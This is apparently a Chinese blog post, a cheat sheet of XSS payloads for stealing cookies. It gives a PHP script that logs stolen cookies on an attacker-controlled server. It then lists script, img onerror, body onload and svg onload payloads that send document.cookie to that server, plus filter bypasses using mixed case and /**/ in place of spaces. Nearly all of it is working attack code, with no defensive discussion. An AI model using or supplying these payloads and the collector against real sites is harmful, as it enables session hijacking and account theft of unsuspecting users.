XSS漏洞--常用payload及绕过

前置准备

  1. 首先准备一个自己的服务器。本地服务器,也就是127.0.0.1不行。
  2. 在服务器的公开的、可访问的目录下准备一个.php文件。我这里命名为flag.php。
  3. flag.php的源代码:
php 复制代码
//flag.php
<?php
$cookie = $_GET['cookie'];
$log = fopen("cookie.txt", "a");
fwrite($log, $cookie . "\n");
fclose($log);
?>

代码的作用是保存从目标服务器盗取的Cookie。
前置知识的学习看这里

payload的基本形式

php 复制代码
//js脚本形式
<script>location.href="http://xx.xx.xx.xx/flag.php?cookie="+document.cookie</script>

//img标签。onerror是图片加载失败时触发的事件。
<img src='#' onerror="window.location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/>

//body标签。onload是页面加载完成时触发的事件。
<body onload="location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/>

//svg标签。
<svg onload="location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/>

绕过方法

大小写绕过:

php 复制代码
<ScRipT> <IMg> <BOdy> <SvG>

空格被过滤:

php 复制代码
使用/**/ 或者 / 绕过
<body/onload="location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/>
<body/**/onload="location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/>
相关推荐
JS_SWKJ2 小时前
网闸:如何在“断连”中实现安全数据交换?
网络安全
一袋米扛几楼982 小时前
什么是 CVE(Common Vulnerabilities and Exposures)?
网络安全
WeeJot嵌入式4 小时前
爬虫对抗:ZLibrary反爬机制实战分析
爬虫·python·网络安全·playwright·反爬机制
hzb666664 小时前
xd_day32-day40
java·javascript·学习·安全·web安全·tomcat·php
旺仔Sec4 小时前
2026年江苏省职业院校技能大赛(教师组) 信息安全管理与评估(技能操作阶段)竞赛样题
网络安全·安全架构
xingxin324 小时前
应急响应处置报告
web安全·网络安全
漠月瑾-西安5 小时前
Cookie Secure 属性:守护网络传输安全的关键防线
网络安全·https·web开发·安全配置·cookie安全·会话保护
Bruce_Liuxiaowei5 小时前
2026年3月第4周网络安全形势周报(1)
人工智能·安全·web安全
oi..6 小时前
Flag和JavaScript document有关
开发语言·前端·javascript·经验分享·笔记·安全·网络安全
大方子7 小时前
【PolarCTF2026年春季挑战赛】The_Gift
网络安全·polarctf